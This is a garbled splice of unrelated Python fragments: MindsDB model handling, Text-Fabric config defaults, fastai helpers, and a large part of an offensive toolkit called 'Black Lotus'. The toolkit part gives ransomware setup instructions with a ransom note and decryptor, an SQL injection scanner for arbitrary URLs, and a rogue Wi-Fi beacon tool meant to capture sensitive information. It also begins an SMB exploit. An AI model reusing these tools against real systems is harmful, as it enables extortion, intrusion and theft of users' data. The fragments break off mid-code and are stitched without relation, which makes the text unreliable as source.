            return explain_arr
        elif pred_format == 'dict':
            return dict_arr
        elif pred_format == 'dict&explain':
            return dict_arr, explain_arr
    # New format -- Try switching to this in 2-3 months for speed, for now above is ok
    else:
        return predictions
@mark_process(name='analyse')
def analyse_dataset(self, ds: dict, company_id: int) -> lightwood.DataAnalysis:
    """Run lightwood's dataset analysis over the datasource described by `ds`.

    `ds` carries {'class', 'args', 'kwargs'}; the class name is resolved
    from mindsdb_datasources and its DataFrame is analysed.
    """
    datasource_cls = getattr(mindsdb_datasources, ds['class'])
    frame = datasource_cls(*ds['args'], **ds['kwargs']).df
    analysis = lightwood.analyze_dataset(frame)
    return analysis.to_dict()  # type: ignore
def get_model_data(self, name, company_id: int):
if '@@@@@' in name:
sn = name.split('@@@@@')
assert len(sn) < 3 # security
name = sn[1]
original_name = name
name = f'{company_id}@@@@@{name}'
predictor_record = db.session.query(db.Predictor).filter_by(company_id=company_id, name=original_name).first()
if predictor_record is None:
raise Exception(f"Model does not exists: {original_name}")
linked_dataset = db.session.query(db.Dataset).get(predictor_record.dataset_id)
data = deepcopy(predictor_record.data)
data['dtype_dict'] = predictor_record.dtype_dict
data['created_at'] = str(parse_datetime(str(predictor_record.created_at).split('.')[0]))
data['updated_at'] = str(parse_datetime(str(predictor_record.updated_at).split('.')[0]))
data['predict'] = predictor_record.to_predict[0]
data['update'] = predictor_record.update_status
data['mindsdb_version'] = predictor_record.mindsdb_version
data['name'] = predictor_record.name
data['code'] = predictor_record.code
data['json_ai'] = predictor_record.json_ai
data['data_source_name'] = linked_dataset.name if linked_dataset else None
data['problem_definition'] = predictor_record.learn_args
# assume older models are complete, only temporary
if 'status' in predictor_record.data:
data['status'] = predictor_record.data['status']
elif 'error' in predictor_record.data:
data['status'] = 'error'
elif predictor_record.update_status == 'available':
data['status'] = 'complete'
elif predictor_record.json_ai is None and predictor_record.code is None:
data['status'] = 'generating'
elif predictor_record.data is None:
data['status'] = 'editable'
elif 'training_log' in predictor_record.data:
data['status'] = 'training'
elif 'error' not in predictor_record.data:
data['status'] = 'complete'
else:
data['status'] = 'error'
if data.get('accuracies', None) is not None:
if | |
cap.isOpened():
raise IOError("Cannot open webcam")
while True:
ret, frame = cap.read()
frame = cv2.resize(frame, None, fx=0.5, fy=0.5, interpolation=cv2.INTER_AREA)
cv2.imshow('Black Lotus camera', frame)
c = cv2.waitKey(1)
if c == 27:
break
cap.release()
cv2.destroyAllWindows()
#----------------------------------------------------------------------------------------------------------------------
def ransomware_instructions():
os.system("cls || clear")
print("""
\033[31mRansomware instructions Panel\033[37m
The infected file is called '\033[31mransomware.py\033[37m'
It's located in the same folder of Black Lotus
1) Open The file and edit the enemy file you want to encrypt
2) Under the '\033[33mATTACK MESSAGE\033[37m' section you have 3 options:
|_1) Change the txt file name ( Default = 'YOU_ARE_FUCKED')
|_\033[31mDONT CHANGE THE FILE TYPE \033[37m( DEFAULT '.txt')
|_2) Change the contact form with an email of your choice
|_3) Change the email name if you want( Default = 'HELP ME')
To Undo the encryption run this script (only the yellow code) :
---------------------------------------------------------- """)
print("\033[33m")
print("""
#!/usr/bin/python
# Ransomware Antidote By The Jes7er
import os
try:
from Crypto.Cipher import XOR
except:
os.system('pip install pycrypto')
import base64
import sys
key = 'matrix'
cipher = XOR.new(key)
pathfile = 'THE FILE YOU WANT TO DECRYPT'
openfile = open(pathfile, 'rb')
readfile = openfile.read()
openfile.close()
encoding = cipher.decrypt(base64.b64decode(readfile))
os.system('rm '+ pathfile)
openfile2 = open(pathfile,'wb')
openfile2.write(encoding)
openfile2.close()
""")
print("""\033[37m------------------------------------------------------------
save this file after the modification as '\033[32mdecryption.py\033[37m'
run it by typing '\033[31mpython3 decryption.py\033[37m'
\n\033[31mREAD FROM THE BEGINNING ^ \033[37m""")
#----------------------------------------------------------------------------------------------------------------------
def updatesystem():
    """Upgrade the host's packages via apt (Debian/Ubuntu only; needs sudo)."""
    import os
    print("\033[31mBlack Lotus is doing some updates for you")
    print("This may take a while.. Grab a coffee\033[37m ")
    # Blocking call; apt's output goes straight to the terminal.
    os.system("sudo apt-get update -y && sudo apt-get upgrade -y")
#----------------------------------------------------------------------------------------------------------------------
def meg_sql_scan():
import requests
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin
from pprint import pprint
logo = ("""\033[37m
[ \033[31mBlack Lotus SQL Injection Scanner\033[37m ]
|
|_________|--------=-----------.
|_________|| | | |=| \033[33m ////////\033[37m |%%========-\033[37m
| |--------=-----------`
|
""")
# initialize an HTTP session & set the browser
s = requests.Session()
s.headers["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
def get_all_forms(url):
"""Given a `url`, it returns all forms from the HTML content"""
soup = bs(s.get(url).content, "html.parser")
return soup.find_all("form")
def get_form_details(form):
"""
This function extracts all possible useful information about an HTML `form`
"""
details = {}
# get the form action (target url)
try:
action = form.attrs.get("action").lower()
except:
action = None
# get the form method (POST, GET, etc.)
method = form.attrs.get("method", "get").lower()
# get all the input details such as type and name
inputs = []
for input_tag in form.find_all("input"):
input_type = input_tag.attrs.get("type", "text")
input_name = input_tag.attrs.get("name")
input_value = input_tag.attrs.get("value", "")
inputs.append({"type": input_type, "name": input_name, "value": input_value})
# put everything to the resulting dictionary
details["action"] = action
details["method"] = method
details["inputs"] = inputs
return details
def is_vulnerable(response):
"""A simple boolean function that determines whether a page
is SQL Injection vulnerable from its `response`"""
errors = {
# MySQL
"you have an error in your sql syntax;",
"warning: mysql",
# SQL Server
"unclosed quotation mark after the character string",
# Oracle
"quoted string not properly terminated",
}
for error in errors:
# if you find one of these errors, return True
if error in response.content.decode().lower():
return True
# no error detected
return False
def scan_sql_injection(url):
# test on URL
for c in "\"'":
# add quote/double quote character to the URL
new_url = f"{url}{c}"
print("[\033[33m!\033[37m] Trying", new_url)
# make the HTTP request
res = s.get(new_url)
if is_vulnerable(res):
# SQL Injection detected on the URL itself,
# no need to preceed for extracting forms and submitting them
print("[\033[31m+\033[37m] SQL Injection vulnerability detected, link:", new_url)
return
# test on HTML forms
forms = get_all_forms(url)
print(f"[\033[31m+\033[37m] Detected {len(forms)} forms on {url}.")
for form in forms:
form_details = get_form_details(form)
for c in "\"'":
# the data body we want to submit
data = {}
for input_tag in form_details["inputs"]:
if input_tag["type"] == "hidden" or input_tag["value"]:
# any input form that is hidden or has some value,
# just use it in the form body
try:
data[input_tag["name"]] = input_tag["value"] + c
except:
pass
elif input_tag["type"] != "submit":
# all others except submit, use some junk data with special character
data[input_tag["name"]] = f"test{c}"
# join the url with the action (form request URL)
url = urljoin(url, form_details["action"])
if form_details["method"] == "post":
res = s.post(url, data=data)
elif form_details["method"] == "get":
res = s.get(url, params=data)
# test whether the resulting page is vulnerable
if is_vulnerable(res):
print("[\033[31m+\033[37m] SQL Injection vulnerability detected, link: ", url)
print("[\033[31m+\033[37m] Form:")
pprint(form_details)
break
if __name__ == "__main__":
print(logo)
url = input("Enter URL > ")
#http://testphp.vulnweb.com/artists.php?artist=1
scan_sql_injection(url)
#----------------------------------------------------------------------------------------------------------------------
def cve_search():
    """Prompt for a CVE identifier and print its MITRE lookup URL."""
    cve = input("Enter cve name \033[5;31m|> \033[0;37m")
    url = 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=' + cve
    print("\033[37mVisit this url to get complete information > \033[31m", url, "\033[37m")
#----------------------------------------------------------------------------------------------------------------------
def steganography_meg():
    """LSB image steganography: hide and reveal a text message in an image.

    Prompts for an input image, an output path and a message, embeds the
    message into the least-significant bit of each pixel channel, writes the
    result and immediately decodes it back as a sanity check.
    """
    import cv2
    import numpy as np

    def to_bin(data):
        """Convert `data` to binary format as string"""
        if isinstance(data, str):
            return ''.join([ format(ord(i), "08b") for i in data ])
        elif isinstance(data, bytes) or isinstance(data, np.ndarray):
            return [ format(i, "08b") for i in data ]
        elif isinstance(data, int) or isinstance(data, np.uint8):
            return format(data, "08b")
        else:
            raise TypeError("Type not supported.")

    def encode(image_name, secret_data):
        # read the image
        image = cv2.imread(image_name)
        # maximum bytes to encode: 3 channels, 1 bit per channel, 8 bits/byte
        n_bytes = image.shape[0] * image.shape[1] * 3 // 8
        print("[*] Maximum bytes to encode:", n_bytes)
        if len(secret_data) > n_bytes:
            raise ValueError("[!] Insufficient bytes, need bigger image or less data.")
        print("[*] Encoding data...")
        # add stopping criteria (decode scans for this terminator)
        secret_data += "====="
        data_index = 0
        # convert data to binary
        binary_secret_data = to_bin(secret_data)
        # size of data to hide
        data_len = len(binary_secret_data)
        for row in image:
            for pixel in row:
                # convert RGB values to binary format
                # NOTE(review): cv2.imread returns channels in BGR order, so
                # 'r' here is really the blue channel; harmless because
                # decode walks the channels in the same order.
                r, g, b = to_bin(pixel)
                # modify the least significant bit only if there is still data to store
                if data_index < data_len:
                    # least significant red pixel bit
                    pixel[0] = int(r[:-1] + binary_secret_data[data_index], 2)
                    data_index += 1
                if data_index < data_len:
                    # least significant green pixel bit
                    pixel[1] = int(g[:-1] + binary_secret_data[data_index], 2)
                    data_index += 1
                if data_index < data_len:
                    # least significant blue pixel bit
                    pixel[2] = int(b[:-1] + binary_secret_data[data_index], 2)
                    data_index += 1
                # if data is encoded, just break out of the loop
                # NOTE(review): this only exits the inner (pixel) loop; the
                # outer row loop keeps scanning -- an inefficiency, not a bug.
                if data_index >= data_len:
                    break
        return image

    def decode(image_name):
        print("[+] Decoding...")
        # read the image
        image = cv2.imread(image_name)
        binary_data = ""
        for row in image:
            for pixel in row:
                r, g, b = to_bin(pixel)
                binary_data += r[-1]
                binary_data += g[-1]
                binary_data += b[-1]
        # split by 8-bits
        all_bytes = [ binary_data[i: i+8] for i in range(0, len(binary_data), 8) ]
        # convert from bits to characters, stopping at the terminator
        decoded_data = ""
        for byte in all_bytes:
            decoded_data += chr(int(byte, 2))
            if decoded_data[-5:] == "=====":
                break
        return decoded_data[:-5]

    # NOTE(review): __name__ refers to the enclosing module, so this guard
    # only passes when the module itself is executed as a script.
    if __name__ == "__main__":
        input_image = input("Enter Image path > ")
        output_image = input("Enter Output path > ")
        secret_data = input("Enter Message to hidde > ")
        # encode the data into the image
        encoded_image = encode(image_name=input_image, secret_data=secret_data)
        # save the output image (encoded image)
        cv2.imwrite(output_image, encoded_image)
        # decode the secret data from the image
        decoded_data = decode(output_image)
        print("[+] Decoded data:", decoded_data)
#----------------------------------------------------------------------------------------------------------------------
def fake_wifi_access_point():
#sudo apt-get install aircrack-ng
import os
os.system('cls||clear')
print("""\033[37m
.&&&&&@&&&&&&&&&&&&&@&&&&%
@@@&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&@@
@&&&&&&&&&&&&&&&&&&@@&&&&&&&&&&&&&&&&&&&&&&&&@@@%
%&&&&&&&&&&@&&# .&&@&&&&&&&&&&&/
&@&&&&&&&@&@ .&&&&&&&&&&&#
@&&&&&&&@ (@@&&&&&&&@@/ &&&&&&&&*
&&& %&@&&&&&&&&&&&&&&&&&&&&&&&@&/ &@&
,&@&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&@&@
%&&&&&&&&&&&@@. *@&&&&&&&&&&&@(
&@&&&&&&/ &&&&&&&&&
@@@ &@%
#&&&&&&&&&&&&&&&@@/
%&&&&&&&&&&&&&&&&&&&&&&&&&*
@&&&&&&@@@/ (@&&@&&&&@#
*&& && \033[31mBlack Lotus Fake Wifi Access Point\033[37m
Capture sensitive information
@&&&&&&&&&@
&&&&&&&
@&&
""")
os.system("sudo airmon-ng check kill")
os.system("sudo airmon-ng")
print("Choose an interface ^ ")
iface = input("Enter interface name \033[36m>\033[37m ")
os.system("sudo airmon-ng start " + str(iface))
sender_mac = RandMAC()
ssid = input("Enter the fake wifi name \033[36m>\033[37m ")
dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=sender_mac, addr3=sender_mac)
beacon = Dot11Beacon()
essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
frame = RadioTap()/dot11/beacon/essid
sendp(frame, inter=0.1, iface=iface, loop=1)
#----------------------------------------------------------------------------------------------------------------------
def google_maps():
    """Geocode a user-supplied place name via the pygeocoder library.

    Requires the third-party `pygeocoder` package; if it is missing, a
    best-effort `pip3 install` is attempted and the import retried once.
    The Geocoder call needs network access and a Google Maps API key.
    """
    try:
        from pygeocoder import Geocoder
    # Fixed: was a bare `except:`, which also swallowed KeyboardInterrupt
    # and unrelated errors; only a missing package should trigger install.
    except ImportError:
        os.system("sudo pip3 install pygeocoder")
        from pygeocoder import Geocoder
    print("You need an API key, to get one go here http://g.co/dev/maps-no-account")
    business_name = input("Enter name or location \033[31m>\033[37m ")
    print("Searching %s" %business_name)
    results = Geocoder.geocode(business_name)
    for result in results:
        print(result)
#----------------------------------------------------------------------------------------------------------------------
def photo_ai():
    """Print a pointer to the PimEyes reverse face-image search service."""
    banner = (
        "\033[37mArtificial Intelligence face scanner",
        "Search all over the web to find persons face",
        "Link \033[31m>\033[33m https://pimeyes.com/en \033[37m",
    )
    for line in banner:
        print(line)
#----------------------------------------------------------------------------------------------------------------------
def reaper():
import os
from datetime import datetime
import time
smb_scan = True
os.system('cls||clear')
print("""\033[31m Black Lotus SMB Exploit | |
specs["repo"]
graphicsRelative = specs["graphicsRelative"]
graphicsModule = [(org, repo, graphicsRelative)] if graphicsRelative else []
specs["zip"] = (
[repo]
+ [(m["org"], m["repo"], m["relative"],) for m in moduleSpecs]
+ graphicsModule
)
for (dKey, method) in (
("dataDisplay", getDataDefaults),
("typeDisplay", getTypeDefaults),
):
method(app, cfg, dKey, False)
app.context = AppCurrent(specs)
def setAppSpecsApi(app, cfg):
    """Complete app.specs with defaults that require a loaded TF API.

    Runs the API-dependent half of the data/type display defaults, records
    the default text format, and resolves the interface options: options in
    `specific` are only allowed when the corpus provides the supporting data
    (a line-number feature resp. graphics); disallowed options get a None
    default.
    """
    api = app.api
    T = api.T
    specs = app.specs
    for (dKey, method) in (
        ("dataDisplay", getDataDefaults),
        ("typeDisplay", getTypeDefaults),
    ):
        # Second pass of the defaults computation, now with withApi=True.
        method(app, cfg, dKey, True)
    specs["textFormat"] = T.defaultFormat
    dKey = "interfaceDefaults"
    interfaceDefaults = {inf[0]: inf[1] for inf in INTERFACE_OPTIONS}
    dSource = cfg.get(dKey, {})
    # These options only make sense when the corpus has the relevant data.
    specific = {"lineNumbers", "showGraphics"}
    allowed = {}
    for (k, v) in interfaceDefaults.items():
        allow = (
            (
                k == "lineNumbers"
                and specs["lineNumberFeature"]
                or k == "showGraphics"
                and specs["hasGraphics"]
            )
            if k in specific
            else True
        )
        # Config value wins over the built-in default; either way a
        # disallowed option is forced to None.
        if k in dSource:
            val = dSource[k]
            default = val if allow else None
        else:
            default = v if allow else None
        interfaceDefaults[k] = default
        allowed[k] = allow
    checker = Check(app, True)
    checker.checkGroup(cfg, interfaceDefaults, dKey, extra=allowed)
    checker.report()
    specs[dKey] = interfaceDefaults
    app.context.update(specs)
    # Bind showContext so that `app.showContext(...)` works as a method call.
    app.showContext = types.MethodType(showContext, app)
def getDataDefaults(app, cfg, dKey, withApi):
    """Fill app.specs with data-display defaults from config section `dKey`.

    Called twice: once before the TF API is loaded (withApi=False) and once
    after (withApi=True); each pass handles only the settings whose
    `needsApi` flag matches the pass.
    """
    checker = Check(app, withApi)
    if withApi:
        api = app.api
        F = api.F
        T = api.T
        sectionTypes = T.sectionTypes
    specs = app.specs
    givenInfo = cfg.get(dKey, {})
    if withApi:
        # Map format names to their display classes; ORIG falls back to the
        # app-wide default class.
        formatStyle = {f[0]: f[1] for f in FORMAT_CLS}
        formatStyle[ORIG] = specs["defaultClsOrig"]
        specs["formatStyle"] = formatStyle
    legalKeys = {d[0] for d in DATA_DISPLAY_DEFAULTS}
    checker.checkGroup(cfg, legalKeys, dKey)
    checker.report()
    for (attr, default, needsApi) in DATA_DISPLAY_DEFAULTS:
        # Skip the settings that belong to the other pass.
        if needsApi and not withApi or not needsApi and withApi:
            continue
        if attr == "browseNavLevel":
            # Default browse depth: one less than the number of section levels.
            default = len(sectionTypes) - 1 if sectionTypes else 1
        value = givenInfo.get(attr, specs.get(attr, default))
        if attr in specs and attr not in givenInfo:
            # Already set in an earlier pass and not overridden by config.
            continue
        elif attr == "exampleSection":
            if not value:
                if sectionTypes:
                    # Use the first node of the lowest section type as example.
                    verseType = sectionTypes[-1]
                    firstVerse = F.otype.s(verseType)[0]
                    value = app.sectionStrFromNode(firstVerse)
                else:
                    value = "passage"
            specs["exampleSection"] = value
            specs["exampleSectionHtml"] = f"<code>{value}</code>"
        if attr == "textFormats":
            # Split each format spec into a custom method and an optional style.
            methods = {fmt: v[METHOD] for (fmt, v) in value.items() if METHOD in v}
            styles = {fmt: v.get(STYLE, None) for (fmt, v) in value.items()}
            specs["formatMethod"] = methods
            specs["formatHtml"] = {T.splitFormat(fmt)[1] for fmt in methods}
            compileFormatCls(app, specs, styles)
        else:
            specs[attr] = value
def getTypeDefaults(app, cfg, dKey, withApi):
    """Compute per-node-type display defaults from config section `dKey`.

    Only runs in the API-bearing pass (withApi=True). Reads the
    `typeDisplay` info from `cfg`, combines it with what the corpus itself
    provides (section/structure types, node-type ranks) and fills app.specs
    with templates, labels, styles, level assignments, parent->child type
    maps and related display metadata.
    """
    if not withApi:
        return
    checker = Check(app, withApi)
    givenInfo = cfg.get(dKey, {})
    customMethods = app.customMethods
    api = app.api
    F = api.F
    T = api.T
    N = api.N
    otypeRank = N.otypeRank
    slotType = F.otype.slotType
    nTypes = F.otype.all
    structureTypes = T.structureTypes
    structureTypeSet = T.structureTypeSet
    sectionTypes = T.sectionTypes
    sectionTypeSet = T.sectionTypeSet
    sectionalTypeSet = sectionTypeSet | structureTypeSet
    specs = app.specs
    # Accumulators that end up in specs.update(...) at the bottom.
    featuresBare = {}
    features = {}
    lineNumberFeature = {}
    hasGraphics = set()
    # The lowest section type acts as the "verse" level, if there is one.
    verseTypes = {sectionTypes[-1]} if sectionTypes else set()
    bigTypes = set()
    verseRank = otypeRank[sectionTypes[-1]] if sectionTypes else None
    lexMap = {}
    baseTypes = set()
    hiddenTypes = set()
    condenseType = None
    templates = {}
    labels = {}
    styles = {}
    givenLevels = {}
    levels = {}
    children = {}
    childType = {}
    exclusions = {}
    transform = {}
    customMethods.set("transform", transform)
    formatStyle = specs["formatStyle"]
    # Seed each type with a default template/label: True for slots and
    # non-verse sectional types, empty string otherwise.
    for nType in nTypes:
        template = (
            True if nType == slotType or nType in sectionalTypeSet - verseTypes else ""
        )
        for dest in (templates, labels):
            dest[nType] = (template, ())
    unknownTypes = {nType for nType in givenInfo if nType not in nTypes}
    if unknownTypes:
        unknownTypesRep = ",".join(sorted(unknownTypes))
        console(f"App config error(s) in typeDisplay: {unknownTypesRep}", error=True)
    # Per-type overrides coming from the app config.
    for (nType, info) in givenInfo.items():
        checker.checkGroup(
            givenInfo,
            TYPE_KEYS,
            nType,
            postpone={
                "base",
                "label",
                "template",
                "features",
                "featuresBare",
                "transform",
            },
        )
        checker.report()
        if info.get("verselike", False):
            verseTypes.add(nType)
        lOcc = info.get("lexOcc", None)
        if lOcc is not None:
            lexMap[lOcc] = nType
        if "base" in info:
            base = info["base"]
            checker.checkSetting("base", base)
            baseTypes.add(nType)
        if "condense" in info:
            condenseType = nType
        trans = info.get("transform", None)
        if trans is not None:
            # Resolve "transform_<name>" methods on the app; fall back to the
            # method name itself when the app does not define it.
            resolvedTrans = {}
            for (feat, func) in trans.items():
                methodName = f"transform_{func}"
                resolvedTrans[feat] = getattr(app, methodName, methodName)
            v = resolvedTrans
            checker.checkSetting("transform", trans, extra=v)
            transform[nType] = v
        for (k, dest) in (("template", templates), ("label", labels)):
            if k in info:
                template = info[k]
                # Extract the feature names referenced inside the template.
                templateFeatures = (
                    VAR_PATTERN.findall(template) if type(template) is str else ()
                )
                dest[nType] = (template, templateFeatures)
                checker.checkSetting(
                    k, template, extra=(template, templateFeatures),
                )
        if "style" in info:
            style = info["style"]
            styles[nType] = formatStyle.get(style, style)
        for k in ("featuresBare", "features"):
            v = info.get(k, "")
            parsedV = parseFeatures(v)
            checker.checkSetting(k, v, extra=parsedV)
            if k == "features":
                features[nType] = parsedV
            else:
                featuresBare[nType] = parsedV
        lineNumber = info.get("lineNumber", None)
        if lineNumber is not None:
            lineNumberFeature[nType] = lineNumber
        graphics = info.get("graphics", False)
        if graphics:
            hasGraphics.add(nType)
        hidden = info.get("hidden", None)
        if hidden:
            hiddenTypes.add(nType)
        verselike = info.get("verselike", False)
        if verselike:
            verseTypes.add(nType)
        if "children" in info:
            # Normalize the children spec to a set of type names.
            childs = info["children"] or ()
            if type(childs) is str:
                childs = {childs}
            else:
                childs = set(childs)
            children[nType] = set(childs or ())
        isBig = info.get("isBig", False)
        if isBig:
            bigTypes.add(nType)
        if "level" in info or "flow" in info or "wrap" in info or "stretch" in info:
            givenLevels[nType] = {
                k: v for (k, v) in info.items() if k in LEVEL_DEFAULTS
            }
        if "exclude" in info:
            exclusions[nType] = info["exclude"] or {}
    checker.report()
    lexTypes = set(lexMap.values())
    nTypesNoLex = [n for n in nTypes if n not in lexTypes]
    specs["allowedValues"] = dict(
        baseTypes=tuple(e for e in nTypesNoLex if e not in sectionTypeSet),
        condenseType=tuple(nTypesNoLex[0:-1]),
        hiddenTypes=tuple(e for e in nTypesNoLex[0:-1] if e not in sectionTypeSet),
    )
    # Partition the node types in 5 display levels: 4 = non-verse sectional,
    # 3 = verse-like, 0 = slots and lexemes, 1/2 = everything in between.
    levelTypes = [set(), set(), set(), set(), set()]
    levelTypes[4] = sectionalTypeSet - verseTypes
    levelTypes[3] = verseTypes
    levelTypes[0] = {slotType} | lexTypes
    remainingTypeSet = set(nTypes) - levelTypes[4] - levelTypes[3] - levelTypes[0]
    remainingTypes = tuple(x for x in nTypes if x in remainingTypeSet)
    nRemaining = len(remainingTypes)
    if nRemaining == 0:
        midType = slotType
    elif nRemaining == 1:
        midType = remainingTypes[0]
        levelTypes[1] = {midType}
    else:
        # Split the middle types in half over levels 2 (big) and 1 (small).
        mid = len(remainingTypes) // 2
        midType = remainingTypes[mid]
        levelTypes[2] = set(remainingTypes[0:mid])
        levelTypes[1] = set(remainingTypes[mid:])
    # Default child relation: each type's child is the next smaller type.
    childType = {
        nType: {nTypesNoLex[i + 1]}
        for (i, nType) in enumerate(nTypesNoLex)
        if i < len(nTypesNoLex) - 1
        # if nType in levelTypes[2] | levelTypes[1]
    }
    mergeDictOfSets(
        childType,
        {
            nType: {structureTypes[i + 1]}
            for (i, nType) in enumerate(structureTypes)
            if i < len(structureTypes) - 1
        },
    )
    mergeDictOfSets(
        childType,
        {
            nType: {sectionTypes[i + 1]}
            for (i, nType) in enumerate(sectionTypes)
            if i < len(sectionTypes) - 1
        },
    )
    # here we override from the children information in the app-config
    for (nType, childInfo) in children.items():
        childType[nType] = childInfo
    lowestSectionalTypes = set() | verseTypes
    if sectionTypes:
        lowestSectionalTypes.add(sectionTypes[-1])
    if structureTypes:
        lowestSectionalTypes.add(structureTypes[-1])
    # Biggest non-sectional type that still ranks below the verse level.
    biggestOtherType = slotType
    for rt in remainingTypes:
        if verseRank is None or otypeRank[rt] < verseRank:
            biggestOtherType = rt
            break
    smallestOtherType = remainingTypes[-1] if remainingTypes else None
    # Lexeme types never act as parents in the display hierarchy.
    for lexType in lexTypes:
        if lexType in childType:
            del childType[lexType]
    # Make sure the hierarchy is connected: lowest sectional types descend
    # into the biggest other type, which eventually reaches the slots.
    for lowestSectionalType in lowestSectionalTypes:
        if lowestSectionalType not in childType:
            childType[lowestSectionalType] = {biggestOtherType}
        else:
            childType[lowestSectionalType].add(biggestOtherType)
    if smallestOtherType is not None and smallestOtherType != slotType:
        if smallestOtherType not in childType:
            childType[smallestOtherType] = {slotType}
        else:
            childType[smallestOtherType].add(slotType)
    if condenseType is None:
        condenseType = sectionTypes[-1] if sectionTypes else midType
    for (i, nTypes) in enumerate(levelTypes):
        for nType in nTypes:
            levels[nType] = getLevel(i, givenLevels.get(nType, {}), nType in verseTypes)
    # Derive the CSS class names per type from its level/flow/wrap settings.
    levelCls = {}
    for (nType, nTypeInfo) in levels.items():
        level = nTypeInfo["level"]
        flow = nTypeInfo["flow"]
        wrap = nTypeInfo["wrap"]
        containerCls = f"contnr c{level}"
        labelCls = f"lbl c{level}"
        childrenCls = (
            f"children {flow} {'wrap' if wrap else ''}"
            if childType.get(nType, None)
            else ""
        )
        levelCls[nType] = dict(
            container=containerCls, label=labelCls, children=childrenCls,
        )
    descendantType = transitiveClosure(childType, {slotType})
    specs.update(
        baseTypes=baseTypes if baseTypes else {slotType},
        bigTypes=bigTypes,
        childType=childType,
        condenseType=condenseType,
        descendantType=descendantType,
        exclusions=exclusions,
        features=features,
        featuresBare=featuresBare,
        hasGraphics=hasGraphics,
        hiddenTypes=hiddenTypes,
        labels=labels,
        levels=levels,
        levelCls=levelCls,
        lexMap=lexMap,
        lexTypes=lexTypes,
        lineNumberFeature=lineNumberFeature,
        noDescendTypes=lexTypes,
        styles=styles,
        templates=templates,
        verseTypes=verseTypes,
    )
def showContext(app, *keys):
    """Pretty-print the app *context* (`tf.advanced.app.App.context`).

    The context is the result of computing sensible defaults for the corpus
    combined with configuration settings in the app's `config.yaml`.

    Parameters
    ----------
    keys: iterable of string
        Only the information for these keys is displayed; when no keys are
        passed, everything is displayed.

    Returns
    -------
    displayed HTML
        An expandable list of the key-value pair for the requested keys.

    See Also
    --------
    tf.advanced.app.App.reuse
    tf.advanced.settings: options allowed in `config.yaml`
    """
    heading = f"<b>{app.appName}</b> <i>app context</i>"
    showDict(heading, app.specs, *keys)
def getLevel(defaultLevel, givenInfo, isVerse):
level = givenInfo.get("level", defaultLevel)
| |
import numpy as np
from fastai.basic_train import Recorder
from fastai.core import ifnone, defaults, Any
from fastai.torch_core import to_np
from fastai.vision import *
import matplotlib.pyplot as plt
from typing import Optional
import scipy
import itertools
def model_cutter(model, select=()):
    """Cut a model down to a prefix sub-network addressed by child indices.

    Args:
        model: any module whose ``children()`` are indexable in order.
        select: sequence of child indices; every element but the last
            descends one level into the child tree. The final index is
            inclusive: the result keeps children ``0..select[-1]``.

    Returns:
        An ``nn.Sequential`` with the selected prefix — or the child itself
        when the final index is 0 and that child already is a Sequential.

    Note: the original used a mutable default ``select=[]``; an empty
    selection still raises IndexError, as before.
    """
    cut = select[0]
    children = list(model.children())
    if len(select) == 1:
        # Final level: keep everything up to and including `cut`.
        if cut == 0 and isinstance(children[0], torch.nn.modules.container.Sequential):
            return children[0]
        return nn.Sequential(*children[:cut + 1])
    # Descend into child `cut`, replacing it with its own cut-down version.
    if cut == 0:
        return model_cutter(children[0], select=select[1:])
    new_children = children[:cut] + [model_cutter(children[cut], select=select[1:])]
    return nn.Sequential(*new_children)
def silent_validate(model:nn.Module, dl:DataLoader, loss_func:OptLossFunc=None, cb_handler:Optional[CallbackHandler]=None,
                    average=True, n_batch:Optional[int]=None)->Iterator[Tuple[Union[Tensor,int],...]]:
    """Calculate `loss_func` of `model` on `dl` in evaluation mode.
    Note: This version does not overwrite results from training"""
    model.eval()
    with torch.no_grad():
        val_losses,nums = [],[]
        if cb_handler: cb_handler.set_dl(dl)
        for xb,yb in dl:
            if cb_handler: xb, yb = cb_handler.on_batch_begin(xb, yb, train=False)
            val_loss = loss_batch(model, xb, yb, loss_func, cb_handler=cb_handler)
            val_losses.append(val_loss)
            # Track per-batch sample counts for the weighted average below.
            if not is_listy(yb): yb = [yb]
            nums.append(first_el(yb).shape[0])
            # Callbacks may request an early stop; n_batch caps the batches.
            if cb_handler and cb_handler.on_batch_end(val_losses[-1]): break
            if n_batch and (len(nums)>=n_batch): break
        nums = np.array(nums, dtype=np.float32)
        # Weighted mean over batches (weights = batch sizes), or raw losses.
        if average: return (to_np(torch.stack(val_losses)) * nums).sum() / nums.sum()
        else: return val_losses
def _svalidate(self, dl=None, callbacks=None, metrics=None):
    "Validate on `dl` with potential `callbacks` and `metrics`."
    # Silent variant of Learner.validate, built on silent_validate (which,
    # per its docstring, does not overwrite results from training).
    dl = ifnone(dl, self.data.valid_dl)
    metrics = ifnone(metrics, self.metrics)
    cb_handler = CallbackHandler(self.callbacks + ifnone(callbacks, []), metrics)
    cb_handler.on_train_begin(1, None, metrics); cb_handler.on_epoch_begin()
    val_metrics = silent_validate(self.model, dl, self.loss_func, cb_handler)
    cb_handler.on_epoch_end(val_metrics)
    return cb_handler.state_dict['last_metrics']
# Attach as a method so `learner.svalidate(...)` is available.
Learner.svalidate = _svalidate
def get_val_stats(learner):
    """Return the latest validation loss and metric values as a dict."""
    recorder = learner.recorder
    stats = {'loss': float(recorder.val_losses[-1])}
    latest_metrics = recorder.metrics[-1]
    stats.update(
        (name, float(latest_metrics[idx]))
        for idx, name in enumerate(recorder.metrics_names)
    )
    return stats
def get_best_stats(learner):
    """Return the epoch stats (loss + metrics) with the lowest error_rate."""
    recorder = learner.recorder
    keys = ['loss'] + recorder.metrics_names
    history = [
        dict(zip(keys, [loss] + [float(v) for v in recorder.metrics[epoch]]))
        for epoch, loss in enumerate(recorder.val_losses)
    ]
    return min(history, key=lambda entry: entry['error_rate'])
def my_smooth(sig, w=2):
    """Sliding-window mean of `sig` with half-width `w`.

    The signal is edge-padded by `w` samples on each side, so the output
    has the same length as the input.
    """
    padded = np.pad(sig, (w, w), 'edge')
    window = 2 * w + 1
    smoothed = []
    for start in range(len(padded) - 2 * w):
        smoothed.append(np.mean(padded[start:start + window]))
    return np.array(smoothed)
def plot2(self, skip_start:int=10, skip_end:int=5, suggestion:bool=True, return_fig:bool=None, win=3,
